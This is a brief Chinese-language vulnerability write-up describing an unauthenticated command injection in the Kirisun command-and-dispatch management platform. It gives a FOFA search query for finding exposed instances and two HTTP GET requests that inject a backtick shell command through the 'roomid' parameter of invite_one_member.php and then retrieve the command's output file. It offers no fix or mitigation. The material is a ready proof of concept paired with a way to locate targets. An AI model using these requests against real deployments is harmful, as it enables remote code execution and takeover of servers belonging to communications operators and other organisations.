0x01 产品简介

科立讯指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案，以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能，可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。

0x02 漏洞概述

科立讯指挥调度管理平台存在命令注入漏洞，未经身份认证的攻击者除了可以利用该漏洞进行代码执行，从而控制服务器。

0x03 测绘语句

fofa：body="指挥调度管理平台"

0x04 漏洞复现

1、GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`id>asd.txt` HTTP/1.1

2、GET /api/client/audiobroadcast/asd.txt HTTP/1.1